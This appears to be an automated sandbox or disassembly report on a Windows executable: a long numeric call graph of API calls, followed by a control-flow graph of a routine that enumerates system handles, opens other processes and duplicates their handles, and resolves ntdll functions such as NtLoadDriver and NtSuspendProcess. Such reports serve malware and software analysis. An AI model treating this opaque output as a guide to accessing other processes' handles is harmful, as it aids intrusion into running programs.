39319->39215 39320->39220 39323->39206 39324->39239 39325->39242 39326->39216 39328 443da3 39327->39328 39329 443db6 39327->39329 39472 41707a 11 API calls 39328->39472 39329->39221 39331 443da8 39332 443dbc 39331->39332 39333 443dac 39331->39333 39474 4300e8 memset memset memcpy 39332->39474 39473 4446ea 11 API calls 39333->39473 39337 443dce 39347->39229 39349 4438d0 39348->39349 39358 4438c9 39348->39358 39350 415378 memcpy memcpy 39349->39350 39351 4438d5 39350->39351 39352 4154e2 10 API calls 39351->39352 39353 443906 39351->39353 39351->39358 39352->39353 39354 443970 memset 39353->39354 39353->39358 39357 44398b 39354->39357 39355 4439a0 39356 415700 10 API calls 39355->39356 39355->39358 39360 4439c0 39356->39360 39357->39355 39359 41975c 10 API calls 39357->39359 39358->39254 39359->39355 39360->39358 39361 418981 10 API calls 39360->39361 39361->39358 39363 415a77 39362->39363 39364 415a8d 39363->39364 39365 415a7e memset 39363->39365 39364->39259 39365->39364 39367 4438b5 11 API calls 39366->39367 39368 41525d 39367->39368 39368->39263 39370 444328 39369->39370 39371 444423 39370->39371 39372 44434e 39370->39372 39373 4446ea 11 API calls 39371->39373 39374 432d4e memset memset memcpy 39372->39374 39381 444381 39373->39381 39375 44435a 39374->39375 39377 444375 39375->39377 39382 44438b 39375->39382 39376 432d4e memset memset memcpy 39378 4443ec 39376->39378 39379 416935 16 API calls 39377->39379 39380 416935 16 API calls 39378->39380 39378->39381 39379->39381 39380->39381 39381->39269 39382->39376 39384 432d58 39383->39384 39386 432d65 39383->39386 39385 432cc4 memset memset memcpy 39384->39385 39385->39386 39386->39277 39437 41703f 11 API calls 39436->39437 39438 43847a 39437->39438 39439 43848a 39438->39439 39440 43847e 39438->39440 39442 438270 134 API calls 39439->39442 39441 4446ea 11 API calls 39440->39441 39444 438488 39441->39444 39443 4384aa 39442->39443 39443->39444 39445 424f26 123 API calls 39443->39445 39444->39300 39446 4384bb 39445->39446 39447 438270 134 API calls 39446->39447 39447->39444 39449 424f1f 39448->39449 39450 424f0c 39448->39450 39452 424eea 11 API calls 39449->39452 39451 416760 11 API calls 39450->39451 39453 424f18 39451->39453 39454 424f24 39452->39454 39453->39303 39454->39303 39455->39307 39457 425108 39456->39457 39463 42510d 39456->39463 39458 424f74 124 API calls 39457->39458 39458->39463 39459 42569b 125 API calls 39460 42516e 39459->39460 39462 415c7d 16 API calls 39460->39462 39461 425115 39461->39309 39462->39461 39463->39459 39463->39461 39464->39309 39465->39309 39472->39331 39473->39329 39474->39337 39505 413f4f 39478->39505 39481 413f37 K32GetModuleFileNameExW 39482 413f4a 39481->39482 39482->38574 39484 413969 wcscpy 39483->39484 39485 41396c wcschr 39483->39485 39488 413a3a 39484->39488 39485->39484 39487 41398e 39485->39487 39510 4097f7 wcslen wcslen _memicmp 39487->39510 39488->38574 39490 41399a 39491 4139a4 memset 39490->39491 39492 4139e6 39490->39492 39511 409dd5 GetWindowsDirectoryW wcscpy 39491->39511 39494 413a31 wcscpy 39492->39494 39495 4139ec memset 39492->39495 39494->39488 39512 409dd5 GetWindowsDirectoryW wcscpy 39495->39512 39496 4139c9 wcscpy wcscat 39496->39488 39498 413a11 memcpy wcscat 39498->39488 39500 413cb0 GetModuleHandleW 39499->39500 39501 413cda 39499->39501 39500->39501 39502 413cbf GetProcAddress 39500->39502 39503 413ce3 GetProcessTimes 39501->39503 39504 413cf6 39501->39504 39502->39501 39503->38577 39504->38577 39506 413f2f 39505->39506 39507 413f54 39505->39507 39506->39481 39506->39482 39508 40a804 8 API calls 39507->39508 39509 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39508->39509 39509->39506 39510->39490 39511->39496 39512->39498 39513->38597 39514->38620 39516 409cf9 GetVersionExW 39515->39516 39517 409d0a 39515->39517 39516->39517 39517->38627 39517->38630 39518->38633 39519->38636 39520->38638 39521->38704 39523 40bba5 39522->39523 39570 40cc26 39523->39570 39526 40bd4b 39591 40cc0c 39526->39591 39531 40b2cc 27 API calls 39532 40bbef 39531->39532 39598 40ccf0 _wcsicmp 39532->39598 39534 40bbf5 39534->39526 39599 40ccb4 6 API calls 39534->39599 39536 40bc26 39537 40cf04 17 API calls 39536->39537 39538 40bc2e 39537->39538 39539 40bd43 39538->39539 39540 40b2cc 27 API calls 39538->39540 39541 40cc0c 4 API calls 39539->39541 39542 40bc40 39540->39542 39541->39526 39600 40ccf0 _wcsicmp 39542->39600 39544 40bc46 39544->39539 39545 40bc61 memset memset WideCharToMultiByte 39544->39545 39601 40103c strlen 39545->39601 39547 40bcc0 39548 40b273 27 API calls 39547->39548 39549 40bcd0 memcmp 39548->39549 39549->39539 39550 40bce2 39549->39550 39551 404423 37 API calls 39550->39551 39552 40bd10 39551->39552 39552->39539 39553 40bd3a LocalFree 39552->39553 39554 40bd1f memcpy 39552->39554 39553->39539 39554->39553 39555->38718 39557 409a74 GetTempFileNameW 39556->39557 39558 409a66 GetWindowsDirectoryW 39556->39558 39557->38715 39558->39557 39559->38756 39560->38756 39561->38756 39562->38756 39563->38756 39564->38756 39565->38756 39566->38756 39567->38756 39568->38731 39569->38753 39602 4096c3 CreateFileW 39570->39602 39572 40cc34 39573 40cc3d GetFileSize 39572->39573 39574 40bbca 39572->39574 39575 40afcf 2 API calls 39573->39575 39574->39526 39582 40cf04 39574->39582 39576 40cc64 39575->39576 39603 40a2ef ReadFile 39576->39603 39578 40cc71 39604 40ab4a MultiByteToWideChar 39578->39604 39580 40cc95 CloseHandle 39581 40b04b ??3@YAXPAX 39580->39581 39581->39574 39583 40b633 free 39582->39583 39584 40cf14 39583->39584 39610 40b1ab free free 39584->39610 39586 40bbdd 39586->39526 39586->39531 39587 40cf1b 39587->39586 39589 40cfef 39587->39589 39611 40cd4b 39587->39611 39590 40cd4b 14 API calls 39589->39590 39590->39586 39592 40b633 free 39591->39592 39593 40cc15 39592->39593 39594 40aa04 free 39593->39594 39595 40cc1d 39594->39595 39660 40b1ab free free 39595->39660 39597 40b7d4 memset CreateFileW 39597->38710 39597->38711 39598->39534 39599->39536 39600->39544 39601->39547 39602->39572 39603->39578 39605 40ab6b 39604->39605 39609 40ab93 39604->39609 39606 40a9ce 4 API calls 39605->39606 39607 40ab74 39606->39607 39608 40ab7c MultiByteToWideChar 39607->39608 39608->39609 39609->39580 39610->39587 39612 40cd7b 39611->39612 39645 40aa29 39612->39645 39614 40cef5 39615 40aa04 free 39614->39615 39616 40cefd 39615->39616 39616->39587 39618 40aa29 6 API calls 39619 40ce1d 39618->39619 39620 40aa29 6 API calls 39619->39620 39621 40ce3e 39620->39621 39622 40ce6a 39621->39622 39653 40abb7 wcslen memmove 39621->39653 39623 40ce9f 39622->39623 39656 40abb7 wcslen memmove 39622->39656 39625 40a8d0 7 API calls 39623->39625 39628 40ceb5 39625->39628 39626 40ce56 39654 40aa71 wcslen 39626->39654 39635 40a8d0 7 API calls 39628->39635 39630 40ce8b 39657 40aa71 wcslen 39630->39657 39631 40ce5e 39655 40abb7 wcslen memmove 39631->39655 39633 40ce93 39658 40abb7 wcslen memmove 39633->39658 39637 40cecb 39635->39637 39659 40d00b malloc memcpy free free 39637->39659 39639 40cedd 39640 40aa04 free 39639->39640 39641 40cee5 39640->39641 39642 40aa04 free 39641->39642 39643 40ceed 39642->39643 39644 40aa04 free 39643->39644 39644->39614 39646 40aa33 39645->39646 39652 40aa63 39645->39652 39647 40aa44 39646->39647 39648 40aa38 wcslen 39646->39648 39649 40a9ce malloc memcpy free free 39647->39649 39648->39647 39650 40aa4d 39649->39650 39651 40aa51 memcpy 39650->39651 39650->39652 39651->39652 39652->39614 39652->39618 39653->39626 39654->39631 39655->39622 39656->39630 39657->39633 39658->39623 39659->39639 39660->39597 39661->38772 39662->38779 37537 44dea5 37538 44deb5 FreeLibrary 37537->37538 37539 44dec3 37537->37539 37538->37539 39672 4148b6 FindResourceW 39673 4148f9 39672->39673 39674 4148cf SizeofResource 39672->39674 39674->39673 39675 4148e0 LoadResource 39674->39675 39675->39673 39676 4148ee LockResource 39675->39676 39676->39673 37716 415304 free 39677 441b3f 39687 43a9f6 39677->39687 39679 441b61 39860 4386af memset 39679->39860 39681 44189a 39682 442bd4 39681->39682 39683 4418e2 39681->39683 39684 4418ea 39682->39684 39862 441409 memset 39682->39862 39683->39684 39861 4414a9 12 API calls 39683->39861 39688 43aa20 39687->39688 39689 43aadf 39687->39689 39688->39689 39690 43aa34 memset 39688->39690 39689->39679 39691 43aa56 39690->39691 39692 43aa4d 39690->39692 39863 43a6e7 39691->39863 39871 42c02e memset 39692->39871 39697 43aad3 39873 4169a7 11 API calls 39697->39873 39698 43aaae 39698->39689 39698->39697 39713 43aae5 39698->39713 39699 43ac18 39702 43ac47 39699->39702 39875 42bbd5 memcpy memcpy memcpy memset memcpy 39699->39875 39703 43aca8 39702->39703 39876 438eed 16 API calls 39702->39876 39706 43acd5 39703->39706 39878 4233ae 11 API calls 39703->39878 39879 423426 11 API calls 39706->39879 39707 43ac87 39877 4233c5 16 API calls 39707->39877 39711 43ace1 39880 439811 163 API calls 39711->39880 39712 43a9f6 161 API calls 39712->39713 39713->39689 39713->39699 39713->39712 39874 439bbb 22 API calls 39713->39874 39715 43acfd 39720 43ad2c 39715->39720 39881 438eed 16 API calls 39715->39881 39717 43ad19 39882 4233c5 16 API calls 39717->39882 39718 43ad58 39883 44081d 163 API calls 39718->39883 39720->39718 39724 43add9 39720->39724 39723 43ae3a memset 39725 43ae73 39723->39725 39724->39724 39887 423426 11 API calls 39724->39887 39888 42e1c0 147 API calls 39725->39888 39726 43adab 39885 438c4e 163 API calls 39726->39885 39729 43ad6c 39729->39689 39729->39726 39884 42370b memset memcpy memset 39729->39884 39731 43adcc 39886 440f84 12 API calls 39731->39886 39732 43ae96 39889 42e1c0 147 API calls 39732->39889 39735 43aea8 39736 43aec1 39735->39736 39890 42e199 147 API calls 39735->39890 39737 43af00 39736->39737 39891 42e1c0 147 API calls 39736->39891 39737->39689 39741 43af1a 39737->39741 39742 43b3d9 39737->39742 39892 438eed 16 API calls 39741->39892 39747 43b3f6 39742->39747 39751 43b4c8 39742->39751 39744 43b60f 39744->39689 39951 4393a5 17 API calls 39744->39951 39746 43af2f 39893 4233c5 16 API calls 39746->39893 39933 432878 12 API calls 39747->39933 39749 43af51 39894 423426 11 API calls 39749->39894 39759 43b4f2 39751->39759 39939 42bbd5 memcpy memcpy memcpy memset memcpy 39751->39939 39753 43af7d 39895 423426 11 API calls 39753->39895 39757 43b529 39941 44081d 163 API calls 39757->39941 39758 43af94 39896 423330 11 API calls 39758->39896 39940 43a76c 21 API calls 39759->39940 39763 43afca 39897 423330 11 API calls 39763->39897 39764 43b47e 39767 43b497 39764->39767 39936 42374a memcpy memset memcpy memcpy memcpy 39764->39936 39765 43b544 39768 43b55c 39765->39768 39942 42c02e memset 39765->39942 39937 4233ae 11 API calls 39767->39937 39943 43a87a 163 API calls 39768->39943 39769 43afdb 39898 4233ae 11 API calls 39769->39898 39774 43b428 39785 43b462 39774->39785 39934 432b60 16 API calls 39774->39934 39776 43b56c 39779 43b58a 39776->39779 39944 423330 11 API calls 39776->39944 39777 43b4b1 39938 423399 11 API calls 39777->39938 39778 43afee 39899 44081d 163 API calls 39778->39899 39945 440f84 12 API calls 39779->39945 39781 43b4c1 39947 42db80 163 API calls 39781->39947 39935 423330 11 API calls 39785->39935 39787 43b592 39946 43a82f 16 API calls 39787->39946 39790 43b5b4 39948 438c4e 163 API calls 39790->39948 39792 43b5cf 39949 42c02e memset 39792->39949 39794 43b005 39794->39689 39798 43b01f 39794->39798 39900 42d836 163 API calls 39794->39900 39795 43b1ef 39910 4233c5 16 API calls 39795->39910 39798->39795 39908 423330 11 API calls 39798->39908 39909 42d71d 163 API calls 39798->39909 39799 43b212 39911 423330 11 API calls 39799->39911 39800 43b087 39901 4233ae 11 API calls 39800->39901 39801 43add4 39801->39744 39950 438f86 16 API calls 39801->39950 39805 43b22a 39912 42ccb5 11 API calls 39805->39912 39808 43b23f 39913 4233ae 11 API calls 39808->39913 39809 43b10f 39904 423330 11 API calls 39809->39904 39811 43b257 39914 4233ae 11 API calls 39811->39914 39815 43b129 39905 4233ae 11 API calls 39815->39905 39816 43b26e 39915 4233ae 11 API calls 39816->39915 39819 43b09a 39819->39809 39902 42cc15 19 API calls 39819->39902 39903 4233ae 11 API calls 39819->39903 39820 43b282 39916 43a87a 163 API calls 39820->39916 39822 43b13c 39906 440f84 12 API calls 39822->39906 39824 43b29d 39917 423330 11 API calls 39824->39917 39827 43b15f 39907 4233ae 11 API calls 39827->39907 39828 43b2af 39830 43b2b8 39828->39830 39831 43b2ce 39828->39831 39918 4233ae 11 API calls 39830->39918 39919 440f84 12 API calls 39831->39919 39834 43b2c9 39921 4233ae 11 API calls 39834->39921 39835 43b2da 39920 42370b memset memcpy memset 39835->39920 39838 43b2f9 39922 423330 11 API calls 39838->39922 39840 43b30b 39923 423330 11 API calls 39840->39923 39842 43b325 39924 423399 11 API calls 39842->39924 39844 43b332 39925 4233ae 11 API calls 39844->39925 39846 43b354 39926 423399 11 API calls 39846->39926 39848 43b364 39927 43a82f 16 API calls 39848->39927 39850 43b370 39928 42db80 163 API calls 39850->39928 39852 43b380 39929 438c4e 163 API calls 39852->39929 39854 43b39e 39930 423399 11 API calls 39854->39930 39856 43b3ae 39931 43a76c 21 API calls 39856->39931 39858 43b3c3 39932 423399 11 API calls 39858->39932 39860->39681 39861->39684 39862->39682 39864 43a6f5 39863->39864 39870 43a765 39863->39870 39864->39870 39952 42a115 39864->39952 39868 43a73d 39869 42a115 147 API calls 39868->39869 39868->39870 39869->39870 39870->39689 39872 4397fd memset 39870->39872 39871->39691 39872->39698 39873->39689 39874->39713 39875->39702 39876->39707 39877->39703 39878->39706 39879->39711 39880->39715 39881->39717 39882->39720 39883->39729 39884->39726 39885->39731 39886->39801 39887->39723 39888->39732 39889->39735 39890->39736 39891->39736 39892->39746 39893->39749 39894->39753 39895->39758 39896->39763 39897->39769 39898->39778 39899->39794 39900->39800 39901->39819 39902->39819 39903->39819 39904->39815 39905->39822 39906->39827 39907->39798 39908->39798 39909->39798 39910->39799 39911->39805 39912->39808 39913->39811 39914->39816 39915->39820 39916->39824 39917->39828 39918->39834 39919->39835 39920->39834 39921->39838 39922->39840 39923->39842 39924->39844 39925->39846 39926->39848 39927->39850 39928->39852 39929->39854 39930->39856 39931->39858 39932->39801 39933->39774 39934->39785 39935->39764 39936->39767 39937->39777 39938->39781 39939->39759 39940->39757 39941->39765 39942->39768 39943->39776 39944->39779 39945->39787 39946->39781 39947->39790 39948->39792 39949->39801 39950->39744 39951->39689 39953 42a175 39952->39953 39955 42a122 39952->39955 39953->39870 39958 42b13b 147 API calls 39953->39958 39955->39953 39956 42a115 147 API calls 39955->39956 39959 43a174 39955->39959 39983 42a0a8 147 API calls 39955->39983 39956->39955 39958->39868 39973 43a196 39959->39973 39974 43a19e 39959->39974 39960 43a306 39960->39973 40003 4388c4 14 API calls 39960->40003 39963 42a115 147 API calls 39963->39974 39965 43a642 39965->39973 40007 4169a7 11 API calls 39965->40007 39969 43a635 40006 42c02e memset 39969->40006 39973->39955 39974->39960 39974->39963 39974->39973 39984 42ff8c 39974->39984 39992 415a91 39974->39992 39996 4165ff 39974->39996 39999 439504 13 API calls 39974->39999 40000 4312d0 147 API calls 39974->40000 40001 42be4c memcpy memcpy memcpy memset memcpy 39974->40001 40002 43a121 11 API calls 39974->40002 39976 4169a7 11 API calls 39977 43a325 39976->39977 39977->39965 39977->39969 39977->39973 39977->39976 39978 42b5b5 memset memcpy 39977->39978 39979 42bf4c 14 API calls 39977->39979 39982 4165ff 11 API calls 39977->39982 40004 42b63e 14 API calls 39977->40004 40005 42bfcf memcpy 39977->40005 39978->39977 39979->39977 39982->39977 39983->39955 40008 43817e 39984->40008 39986 42ff99 39987 42ffe3 39986->39987 39988 42ffd0 39986->39988 39991 42ff9d 39986->39991 40013 4169a7 11 API calls 39987->40013 40012 4169a7 11 API calls 39988->40012 39991->39974 39993 415a9d 39992->39993 39994 415ab3 39993->39994 39995 415aa4 memset 39993->39995 39994->39974 39995->39994 40162 4165a0 39996->40162 39999->39974 40000->39974 40001->39974 40002->39974 40003->39977 40004->39977 40005->39977 40006->39965 40007->39973 40009 438187 40008->40009 40011 438192 40008->40011 40014 4380f6 40009->40014 40011->39986 40012->39991 40013->39991 40016 43811f 40014->40016 40015 438164 40015->40011 40016->40015 40019 437e5e 40016->40019 40042 4300e8 memset memset memcpy 40016->40042 40043 437d3c 40019->40043 40021 437eb3 40021->40016 40022 437ea9 40022->40021 40027 437f22 40022->40027 40058 41f432 40022->40058 40025 437f06 40105 415c56 11 API calls 40025->40105 40029 437f7f 40027->40029 40030 432d4e 3 API calls 40027->40030 40028 437f95 40106 415c56 11 API calls 40028->40106 40029->40028 40031 43802b 40029->40031 40030->40029 40034 4165ff 11 API calls 40031->40034 40033 437fa3 40033->40021 40109 41f638 104 API calls 40033->40109 40035 438054 40034->40035 40069 437371 40035->40069 40038 43806b 40039 438094 40038->40039 40107 42f50e 138 API calls 40038->40107 40039->40033 40108 4300e8 memset memset memcpy 40039->40108 40042->40016 40044 437d69 40043->40044 40047 437d80 40043->40047 40110 437ccb 11 API calls 40044->40110 40046 437d76 40046->40022 40047->40046 40048 437da3 40047->40048 40050 437d90 40047->40050 40051 438460 134 API calls 40048->40051 40050->40046 40114 437ccb 11 API calls 40050->40114 40054 437dcb 40051->40054 40052 437de8 40113 424f26 123 API calls 40052->40113 40054->40052 40111 444283 13 API calls 40054->40111 40056 437dfc 40112 437ccb 11 API calls 40056->40112 40059 41f54d 40058->40059 40063 41f44f 40058->40063 40060 41f466 40059->40060 40144 41c635 memset memset 40059->40144 40060->40025 40060->40027 40063->40060 40067 41f50b 40063->40067 40115 41f1a5 40063->40115 40140 41c06f memcmp 40063->40140 40141 41f3b1 90 API calls 40063->40141 40142 41f398 86 API calls 40063->40142 40067->40059 40067->40060 40143 41c295 86 API calls 40067->40143 40145 41703f 40069->40145 40071 437399 40072 43739d 40071->40072 40074 4373ac 40071->40074 40152 4446ea 11 API calls 40072->40152 40075 416935 16 API calls 40074->40075 40091 4373ca 40075->40091 40076 437584 40078 4375bc 40076->40078 40159 42453e 123 API calls 40076->40159 40077 438460 134 API calls 40077->40091 40080 415c7d 16 API calls 40078->40080 40081 4375d2 40080->40081 40083 4442e6 11 API calls 40081->40083 40085 4373a7 40081->40085 40082 4251c4 137 API calls 40082->40091 40084 4375e2 40083->40084 40084->40085 40160 444283 13 API calls 40084->40160 40085->40038 40087 415a91 memset 40087->40091 40090 43758f 40158 42453e 123 API calls 40090->40158 40091->40076 40091->40077 40091->40082 40091->40087 40091->40090 40104 437d3c 135 API calls 40091->40104 40153 425433 13 API calls 40091->40153 40154 425413 17 API calls 40091->40154 40155 42533e 16 API calls 40091->40155 40156 42538f 16 API calls 40091->40156 40157 42453e 123 API calls 40091->40157 40094 4375f4 40098 437620 40094->40098 40099 43760b 40094->40099 40096 43759f 40097 416935 16 API calls 40096->40097 40097->40076 40100 416935 16 API calls 40098->40100 40161 444283 13 API calls 40099->40161 40100->40085 40103 437612 memcpy 40103->40085 40104->40091 40105->40021 40106->40033 40107->40039 40108->40033 40109->40021 40110->40046 40111->40056 40112->40052 40113->40046 40114->40046 40116 41bc3b 101 API calls 40115->40116 40117 41f1b4 40116->40117 40118 41edad 86 API calls 40117->40118 40125 41f282 40117->40125 40119 41f1cb 40118->40119 40120 41f1f5 memcmp 40119->40120 40121 41f20e 40119->40121 40119->40125 40120->40121 40122 41f21b memcmp 40121->40122 40121->40125 40123 41f326 40122->40123 40126 41f23d 40122->40126 40124 41ee6b 86 API calls 40123->40124 40123->40125 40124->40125 40125->40063 40126->40123 40127 41f28e memcmp 40126->40127 40129 41c8df 56 API calls 40126->40129 40127->40123 40128 41f2a9 40127->40128 40128->40123 40131 41f308 40128->40131 40132 41f2d8 40128->40132 40130 41f269 40129->40130 40130->40123 40133 41f287 40130->40133 40134 41f27a 40130->40134 40131->40123 40138 4446ce 11 API calls 40131->40138 40135 41ee6b 86 API calls 40132->40135 40133->40127 40136 41ee6b 86 API calls 40134->40136 40137 41f2e0 40135->40137 40136->40125 40139 41b1ca memset 40137->40139 40138->40123 40139->40125 40140->40063 40141->40063 40142->40063 40143->40059 40144->40060 40146 417044 40145->40146 40147 41705c 40145->40147 40149 416760 11 API calls 40146->40149 40151 417055 40146->40151 40148 417075 40147->40148 40150 41707a 11 API calls 40147->40150 40148->40071 40149->40151 40150->40146 40151->40071 40152->40085 40153->40091 40154->40091 40155->40091 40156->40091 40157->40091 40158->40096 40159->40078 40160->40094 40161->40103 40167 415cfe 40162->40167 40168 41628e 40167->40168 40173 415d23 __aullrem __aulldvrm 40167->40173 40175 416520 40168->40175 40169 4163ca 40181 416422 11 API calls 40169->40181 40171 416422 10 API calls 40171->40173 40172 416172 memset 40172->40173 40173->40168 40173->40169 40173->40171 40173->40172 40174 415cb9 10 API calls 40173->40174 40174->40173 40176 416527 40175->40176 40180 416574 40175->40180 40178 416544 40176->40178 40176->40180 40182 4156aa 11 API calls 40176->40182 40179 416561 memcpy 40178->40179 40178->40180 40179->40180 40180->39974 40181->40168 40182->40178 40204 41493c EnumResourceNamesW 37541 4287c1 37542 4287d2 37541->37542 37543 429ac1 37541->37543 37544 428818 37542->37544 37545 42881f 37542->37545 37559 425711 37542->37559 37558 425ad6 37543->37558 37611 415c56 11 API calls 37543->37611 37578 42013a 37544->37578 37606 420244 97 API calls 37545->37606 37550 4260dd 37605 424251 120 API calls 37550->37605 37552 4259da 37604 416760 11 API calls 37552->37604 37557 429a4d 37561 429a66 37557->37561 37562 429a9b 37557->37562 37559->37543 37559->37552 37559->37557 37560 422aeb memset memcpy memcpy 37559->37560 37564 4260a1 37559->37564 37574 4259c2 37559->37574 37577 425a38 37559->37577 37594 4227f0 memset memcpy 37559->37594 37595 422b84 15 API calls 37559->37595 37596 422b5d memset memcpy memcpy 37559->37596 37597 422640 13 API calls 37559->37597 37599 4241fc 11 API calls 37559->37599 37600 42413a 90 API calls 37559->37600 37560->37559 37607 415c56 11 API calls 37561->37607 37566 429a96 37562->37566 37609 416760 11 API calls 37562->37609 37603 415c56 11 API calls 37564->37603 37610 424251 120 API calls 37566->37610 37569 429a7a 37608 416760 11 API calls 37569->37608 37574->37558 37598 415c56 11 API calls 37574->37598 37577->37574 37601 422640 13 API calls 37577->37601 37602 4226e0 12 API calls 37577->37602 37579 42014c 37578->37579 37582 420151 37578->37582 37621 41e466 97 API calls 37579->37621 37581 420162 37581->37559 37582->37581 37583 4201b3 37582->37583 37584 420229 37582->37584 37585 4201b8 37583->37585 37586 4201dc 37583->37586 37584->37581 37587 41fd5e 86 API calls 37584->37587 37612 41fbdb 37585->37612 37586->37581 37590 4201ff 37586->37590 37618 41fc4c 37586->37618 37587->37581 37590->37581 37593 42013a 97 API calls 37590->37593 37593->37581 37594->37559 37595->37559 37596->37559 37597->37559 37598->37552 37599->37559 37600->37559 37601->37577 37602->37577 37603->37552 37604->37550 37605->37558 37606->37559 37607->37569 37608->37566 37609->37566 37610->37543 37611->37552 37613 41fbf8 37612->37613 37616 41fbf1 37612->37616 37626 41ee26 37613->37626 37617 41fc39 37616->37617 37636 4446ce 11 API calls 37616->37636 37617->37581 37622 41fd5e 37617->37622 37619 41ee6b 86 API calls 37618->37619 37620 41fc5d 37619->37620 37620->37586 37621->37582 37624 41fd65 37622->37624 37623 41fdab 37623->37581 37624->37623 37625 41fbdb 86 API calls 37624->37625 37625->37624 37627 41ee41 37626->37627 37628 41ee32 37626->37628 37637 41edad 37627->37637 37640 4446ce 11 API calls 37628->37640 37631 41ee3c 37631->37616 37634 41ee58 37634->37631 37642 41ee6b 37634->37642 37636->37617 37646 41be52 37637->37646 37640->37631 37641 41eb85 11 API calls 37641->37634 37643 41ee70 37642->37643 37644 41ee78 37642->37644 37702 41bf99 86 API calls 37643->37702 37644->37631 37647 41be6f 37646->37647 37648 41be5f 37646->37648 37653 41be8c 37647->37653 37667 418c63 37647->37667 37681 4446ce 11 API calls 37648->37681 37651 41be69 37651->37631 37651->37641 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37658 41bee7 37653->37658 37684 4446ce 11 API calls 37654->37684 37657 41bef0 37655->37657 37661 41bee2 37655->37661 37657->37658 37659 41bf01 37657->37659 37658->37651 37685 41a453 86 API calls 37658->37685 37660 41bf24 memset 37659->37660 37665 41bf14 37659->37665 37682 418a6d memset memcpy memset 37659->37682 37660->37651 37671 41ac13 37661->37671 37683 41a223 memset memcpy memset 37665->37683 37666 41bf20 37666->37660 37670 418c72 37667->37670 37668 418c94 37668->37653 37669 418d51 memset memset 37669->37668 37670->37668 37670->37669 37672 41ac52 37671->37672 37673 41ac3f memset 37671->37673 37675 41ac6a 37672->37675 37686 41dc14 19 API calls 37672->37686 37678 41acd9 37673->37678 37677 41aca1 37675->37677 37687 41519d 37675->37687 37677->37678 37679 41acc0 memset 37677->37679 37680 41accd memcpy 37677->37680 37678->37658 37679->37678 37680->37678 37681->37651 37682->37665 37683->37666 37684->37658 37686->37675 37690 4175ed 37687->37690 37698 417570 SetFilePointer 37690->37698 37693 41760a ReadFile 37694 417637 37693->37694 37695 417627 GetLastError 37693->37695 37696 41763e memset 37694->37696 37697 4151b3 37694->37697 37695->37697 37696->37697 37697->37677 37699 4175b2 37698->37699 37700 41759c GetLastError 37698->37700 37699->37693 37699->37697 37700->37699 37701 4175a8 GetLastError 37700->37701 37701->37699 37702->37644 37703 417bc5 37704 417c61 37703->37704 37705 417bda 37703->37705 37705->37704 37706 417bf6 UnmapViewOfFile CloseHandle 37705->37706 37708 417c2c 37705->37708 37710 4175b7 37705->37710 37706->37705 37706->37706 37708->37705 37715 41851e 20 API calls 37708->37715 37711 4175d6 CloseHandle 37710->37711 37712 4175c8 37711->37712 37713 4175df 37711->37713 37712->37713 37714 4175ce Sleep 37712->37714 37713->37705 37714->37711 37715->37708 39663 4147f3 39666 414561 39663->39666 39665 414813 39667 41456d 39666->39667 39668 41457f GetPrivateProfileIntW 39666->39668 39671 4143f1 memset _itow WritePrivateProfileStringW 39667->39671 39668->39665 39670 41457a 39670->39665 39671->39670

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
